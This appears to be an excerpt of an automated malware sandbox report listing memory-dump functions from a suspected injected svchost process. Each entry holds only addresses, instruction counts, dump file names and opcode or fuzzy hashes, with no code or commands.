                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50dbb2deb9bc0c22ed314525dade46c59f53d1fab18c2ca528d45a3b5aa40d4d
                                                                                                              • Instruction ID: 9a70ed2e7bd308d60a2801323d68e42005ab218fea5f23827e669614658751a4
                                                                                                              • Opcode Fuzzy Hash: 50dbb2deb9bc0c22ed314525dade46c59f53d1fab18c2ca528d45a3b5aa40d4d
                                                                                                              • Instruction Fuzzy Hash: 5B6174B5A00616EFDB18DF69C480AADFBB5FF49204F1881BAD519AB340DF30A951CBD0
                                                                                                              Function 03BF92A6 Relevance: .2, Instructions: 174COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb470da025256bf9e1380b5876c9da16a94cec27375b14b464bd874ab935d8a2
                                                                                                              • Instruction ID: 65bc52c918f2ed8a45a3f31f45a44d4a4229bc7c94a9ea929d47aee54585bb27
                                                                                                              • Opcode Fuzzy Hash: bb470da025256bf9e1380b5876c9da16a94cec27375b14b464bd874ab935d8a2
                                                                                                              • Instruction Fuzzy Hash: 5B61C0356047428FD325CF68C494B6AB7E0FF9070CF1854BDEA958B291DB35E90ACB81
                                                                                                              Function 03BFCE93 Relevance: .2, Instructions: 172COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                              • Instruction ID: d14d384331808466b5352d9d442c93d386e6b969f3b5d3c79809231d4a2de41f
                                                                                                              • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                              • Instruction Fuzzy Hash: 0851133260430A4FC714DE28886076AFFD6EFC1258F19A4FDEA95CB249DB30D94D8791
                                                                                                              Function 0040FCAA Relevance: .2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5536a0d6976fb1126caeda13ec117f3dd1b7c112dee014b2ba0a0dc8947dd8f3
                                                                                                              • Instruction ID: 29c0604e558228a61f6f4935ad19ca780d4fb54f3398491cdc2dc5d4dadc37ea
                                                                                                              • Opcode Fuzzy Hash: 5536a0d6976fb1126caeda13ec117f3dd1b7c112dee014b2ba0a0dc8947dd8f3
                                                                                                              • Instruction Fuzzy Hash: C15193B3E146214BD318CF09CC40631B792FFC8312B5B81BEDD199B367CA34E9529A90
                                                                                                              Function 0040FCB3 Relevance: .2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                              • Instruction ID: 025723e4da0e9858469e6144b70e4408f3518c179fafa9b43a19f9adea39dcae
                                                                                                              • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                              • Instruction Fuzzy Hash: F85173B3E14A214BD318CE09CC40631B792FFD8312B5F81BEDD199B397CA74E9529A90
                                                                                                              Function 03BF7D73 Relevance: .2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 42bd0679769b4f7b738f4c0bf01333052f4df17223b1c47186c5f87e6f0c6f12
                                                                                                              • Instruction ID: 2d25d1da4f2d5b376f41e93b7c0bceeeca4652b1bbc656cdc5bce8f5a8ff4e6b
                                                                                                              • Opcode Fuzzy Hash: 42bd0679769b4f7b738f4c0bf01333052f4df17223b1c47186c5f87e6f0c6f12
                                                                                                              • Instruction Fuzzy Hash: 8051C436A101498FCB08CF78C481AEEB7F5EF58314B1982BAD915DB355EB30DA19CB90
                                                                                                              Function 03B43740 Relevance: .2, Instructions: 159COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c31012c6e408ddf111c3c28a03335e8ea7ba6fa699f77f953c02b8d7f8c7cf7a
                                                                                                              • Instruction ID: d518252bb2bc086340503d0159bfee84a8d22a20125256303c3c6a8d142efbd2
                                                                                                              • Opcode Fuzzy Hash: c31012c6e408ddf111c3c28a03335e8ea7ba6fa699f77f953c02b8d7f8c7cf7a
                                                                                                              • Instruction Fuzzy Hash: D751CD79A00616ABC711CF68C480A69F7B0FF44718F0982F5E899DB740E735E9A1DB84
                                                                                                              Function 03B37152 Relevance: .2, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 64cae2f3a59426651d6daff27e9533c16d1a0cdc287fbd8665d441a5c6743620
                                                                                                              • Instruction ID: f2a31c5a2ddb1e74891ca2bc8cc83139f313fe68343bd43c797cfb625f33449c
                                                                                                              • Opcode Fuzzy Hash: 64cae2f3a59426651d6daff27e9533c16d1a0cdc287fbd8665d441a5c6743620
                                                                                                              • Instruction Fuzzy Hash: 8E51FFB5A00A1AEFEF15DF68C845BADB7B4FF05318F1440FAE40297290DB749901DB80
                                                                                                              Function 03BB3A6C Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83461fd06fedb319bf23d61b8f6ba3a1d2253b6b10ddcfbf000df43060810511
                                                                                                              • Instruction ID: 41acdc51375a2a284f84c421c69a9ed8ba4ad4a481c7b71eccdd26706829e94d
                                                                                                              • Opcode Fuzzy Hash: 83461fd06fedb319bf23d61b8f6ba3a1d2253b6b10ddcfbf000df43060810511
                                                                                                              • Instruction Fuzzy Hash: 2951BE76E4012D4BEF25CA58D461BFFB3F2EB44310F480869E849FB3C4CAB66956D550
                                                                                                              Function 03BAD800 Relevance: .2, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9543251b18793cdb1e0d19e3bf2d5ff73d21c522d695dd2dbe2653ea4b2e0d6b
                                                                                                              • Instruction ID: 22a3eb5bc55304eefc0d3b078f985a0a6cde93aae72de0681562818a2dc9181f
                                                                                                              • Opcode Fuzzy Hash: 9543251b18793cdb1e0d19e3bf2d5ff73d21c522d695dd2dbe2653ea4b2e0d6b
                                                                                                              • Instruction Fuzzy Hash: 46519E74A08A15ABCB14DF6DC4A0ABEB7B4FF45708B0942FDE941DBA90E734D950CB90
                                                                                                              Function 03BFD26B Relevance: .2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                              • Instruction ID: 848c16334a1ef872dc389846bcf89100288959ac2c04cee8cb91fd2ce6f8f920
                                                                                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                              • Instruction Fuzzy Hash: 99517E766087429FC711CF28C884B5ABBE5FFC8348F04996DFA948B244D734E949CB52
                                                                                                              Function 03BF7571 Relevance: .2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce61915d62723904dd6e30ccf6cd935772529f9ce6d03f8942acf398bf1dfb1b
                                                                                                              • Instruction ID: 93a964f5eff879b1ed575405e6110c9a1700f95502908d21f77da6c5c29a1951
                                                                                                              • Opcode Fuzzy Hash: ce61915d62723904dd6e30ccf6cd935772529f9ce6d03f8942acf398bf1dfb1b
                                                                                                              • Instruction Fuzzy Hash: B651C131A10219AFCB14DB69D845A6EFBB9FF48388F0841F9DA11D7254DF70AE19CB80
                                                                                                              Function 03B351ED Relevance: .1, Instructions: 149COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4d7c3aa323419f3ef4c4593de13b45df214c09693e36c11e918bb0e59deee01
                                                                                                              • Instruction ID: c78b6d1cb2e13e445856980d0ff09a0c316975bc0759ef3786d79a111f02506d
                                                                                                              • Opcode Fuzzy Hash: b4d7c3aa323419f3ef4c4593de13b45df214c09693e36c11e918bb0e59deee01
                                                                                                              • Instruction Fuzzy Hash: 1F515175A05225DFEF31EBA9CC40BADB7B8EB0671CF1404FAD812EB251D7B499408B61
                                                                                                              Function 03B6F71F Relevance: .1, Instructions: 143COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a10a9dca8e75ef482ba258a065f23b44f0c373460d46e0052056512a5d026764
                                                                                                              • Instruction ID: 60980fd772677e66e75897a6d851d48bcfd9fd0e36e524d88d01a43052258472
                                                                                                              • Opcode Fuzzy Hash: a10a9dca8e75ef482ba258a065f23b44f0c373460d46e0052056512a5d026764
                                                                                                              • Instruction Fuzzy Hash: 2A419576D05629ABDF11DBA99880ABFB6BCEF05758F0501FAE904EB201D634DE0097E4
                                                                                                              Function 03B601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 213fb137b2a752e72c1bfded9625315ad7323ecdaef91410e830cbdcc2a8b4e1
                                                                                                              • Instruction ID: fc358493689861c20b9976a65bb2d50766dbd0cd07f11bcb12b09196b102c111
                                                                                                              • Opcode Fuzzy Hash: 213fb137b2a752e72c1bfded9625315ad7323ecdaef91410e830cbdcc2a8b4e1
                                                                                                              • Instruction Fuzzy Hash: DD41AE36D042159BCB14EF99C440AEDF7B4FF88618F1881BAE816EB241D7389D41CBA4
                                                                                                              Function 03B72750 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: bfc89886f22359ede07f76b80e008effb95fb3554067d7ef79200e291d14236f
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: 34512875A04A15DFCB14CF99C580AAEF7F6FF84714F2881A9D815AB350D730AE42CBA0
                                                                                                              Function 03B36154 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c8eb2d9fe929419b7d9c6e5f01712bb98bda85c901645b3bbab1eb93f3b80532
                                                                                                              • Instruction ID: 52af47a66368178638cf71c5df76d42ea401c077e7ca4a02d7d411c50f3c9017
                                                                                                              • Opcode Fuzzy Hash: c8eb2d9fe929419b7d9c6e5f01712bb98bda85c901645b3bbab1eb93f3b80532
                                                                                                              • Instruction Fuzzy Hash: B751F770E04626EBDB25DB64CC44BA8BBB5EF0631CF1882F5D5299B2D1D7789981CF40
                                                                                                              Function 03B2B136 Relevance: .1, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 72a5e1e7a7107e16d60c805021c7193807f4f0ca2c4ca19d99ddc6319ade0f49
                                                                                                              • Instruction ID: 8640f049c0a16c46154840738a563f037a7a6dabd4d5b24b4ad59d1c5edd93b3
                                                                                                              • Opcode Fuzzy Hash: 72a5e1e7a7107e16d60c805021c7193807f4f0ca2c4ca19d99ddc6319ade0f49
                                                                                                              • Instruction Fuzzy Hash: EC419CB5A40715EFDB25EF68C840B2ABFA8EF00798F0445F9E559DB251DB74D810CBA0
                                                                                                              Function 03BFF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6172e92af359ea04183a64a5032e995373181a0217d4861448ce179c586b8234
                                                                                                              • Instruction ID: f7a5f74659fc22f7652cb102e2205be9d3c0ed30da6da0ab4959bbae9bbaa5d4
                                                                                                              • Opcode Fuzzy Hash: 6172e92af359ea04183a64a5032e995373181a0217d4861448ce179c586b8234
                                                                                                              • Instruction Fuzzy Hash: 1141C0752083418FD704CF25D8A597ABBE1EBC4719F098AAEF9958B282C730D909CB61
                                                                                                              Function 03BDD5B0 Relevance: .1, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1392fe56fb9c6d34d295971f59b1b9b1f245b06245165d377ab30e2528ee5ee8
                                                                                                              • Instruction ID: bb372f79f3a950eddfd8b0019cae5b71a5897722fd8fe038934cadccac7e6aee
                                                                                                              • Opcode Fuzzy Hash: 1392fe56fb9c6d34d295971f59b1b9b1f245b06245165d377ab30e2528ee5ee8
                                                                                                              • Instruction Fuzzy Hash: 0541F230A082959FCB14DF29C495ABAFBF1EF49308F0984EDE4C58B245E735A456DBA0
                                                                                                              Function 03B5D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6371d830dfd7abe383afc9ff084f281374bb02ca1729f4710476a8453825b03b
                                                                                                              • Instruction ID: 4b091a3f5151baf35fdc02004939b63f6b9d672fe24a41cc8022b63830f02ce3
                                                                                                              • Opcode Fuzzy Hash: 6371d830dfd7abe383afc9ff084f281374bb02ca1729f4710476a8453825b03b
                                                                                                              • Instruction Fuzzy Hash: EC41D1795143109BDB24EF65C890B2BB7A8EB55339F0406BEF825CF290CB30E841CB91
                                                                                                              Function 03B2A020 Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 3b53c21474eeb4ecf65d95accfc642597952c5f717775a4f3d106fbe36b4d4b8
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 3C412B31A00225DBDB24EFB584907BBFB62EB5075DF1982FBE9499B240DA359D40CB90
                                                                                                              Function 03B60710 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: ebd5d524236c042a9a6eec3730c3d575fe01520c8d1d08c2da743d6211feca4e
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: E7412775A04705EFCB24DF99C980AAAB7F8FF08708B1049BDE556DB251D334AA44CF90
                                                                                                              Function 03B3262C Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e5ab6f8e4fd42155ec9472989389bfda20abd38dad8b57203adc1ed02d7b5f1e
                                                                                                              • Instruction ID: 963a96d4a1dcb6332f0929d3ac45f75b80050d118c81a4c44f0e1de540b2571e
                                                                                                              • Opcode Fuzzy Hash: e5ab6f8e4fd42155ec9472989389bfda20abd38dad8b57203adc1ed02d7b5f1e
                                                                                                              • Instruction Fuzzy Hash: 41419975901724DFCB21EF28D940A69B7B5FF4A318F148AF9C416DF2A1EB309941CB51
                                                                                                              Function 03BFFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b66a46df376bd1e2c0e83d4dcbad95b65fb0783bf2e319731d480df2a51b3a8
                                                                                                              • Instruction ID: ec7111b01a0df2eb3878536a589c82c0adff6b3cdd6feb9ed3c9eebc5ba3b3c1
                                                                                                              • Opcode Fuzzy Hash: 2b66a46df376bd1e2c0e83d4dcbad95b65fb0783bf2e319731d480df2a51b3a8
                                                                                                              • Instruction Fuzzy Hash: B4412A359042A55BDB44CB2684A07BEBFF1BF8520DF0EC1A6D881DB282D639C646C770
                                                                                                              Function 03BB07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0ccd42a0867676b1bee161b2af97c06418f1ca9c05f2a14d8c80e4594565fb5
                                                                                                              • Instruction ID: 954b1c4b7f78f6704b715ba3ea7bdb77dfe2e1e38642b91455ed6f43c14938c3
                                                                                                              • Opcode Fuzzy Hash: a0ccd42a0867676b1bee161b2af97c06418f1ca9c05f2a14d8c80e4594565fb5
                                                                                                              • Instruction Fuzzy Hash: 244171715143009FD720EF29C845BABBBE8FF88658F004A7EF5A8D7251DB709904CB92
                                                                                                              Function 03BFFA49 Relevance: .1, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d2a8dea6cc152d28985c1e19026144bf3d57ece7914cc7ed244e61d04f52fb4
                                                                                                              • Instruction ID: c500c400422b9dbb24a208769437eeab09c46950ce2d34449df8ed0548bad2f0
                                                                                                              • Opcode Fuzzy Hash: 0d2a8dea6cc152d28985c1e19026144bf3d57ece7914cc7ed244e61d04f52fb4
                                                                                                              • Instruction Fuzzy Hash: EC3116367101069FC718CF29CC44BB6BBA9EF84758F0896F4EA18CB285EA74D949C794
                                                                                                              Function 03BFEEDB Relevance: .1, Instructions: 113COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bedaa43099791da43f0e13c963aff474206913646339bbf4c12adf50458a619
                                                                                                              • Instruction ID: 83efdf3568c74686077e85850a99dafd3aceb8c68a4075fe64197a6272ee3cc6
                                                                                                              • Opcode Fuzzy Hash: 4bedaa43099791da43f0e13c963aff474206913646339bbf4c12adf50458a619
                                                                                                              • Instruction Fuzzy Hash: 6C418133E1412A8BCB18DF68D49197AF3F5FB48308B5642BDD905EB294DB34AD05CB90
                                                                                                              Function 03BFFB76 Relevance: .1, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b21a1280b418ee708e420564d155ce3130c8b579cc35c7081206a42ebd1daad
                                                                                                              • Instruction ID: aad63b230cae10a6f57a16929f1bb42a83fa07c6a6d34f7d384dd93ed8b222f8
                                                                                                              • Opcode Fuzzy Hash: 0b21a1280b418ee708e420564d155ce3130c8b579cc35c7081206a42ebd1daad
                                                                                                              • Instruction Fuzzy Hash: F431E336610115AFD714DF29CC44AABBBE5EF88358F4594B8FA08CF241D634E905C790
                                                                                                              Function 0040DF53 Relevance: .1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                              • Instruction ID: 1aa7791497de71d852e926a4a966dac8ecbfaff0d4d4367d643b8cc90c56911c
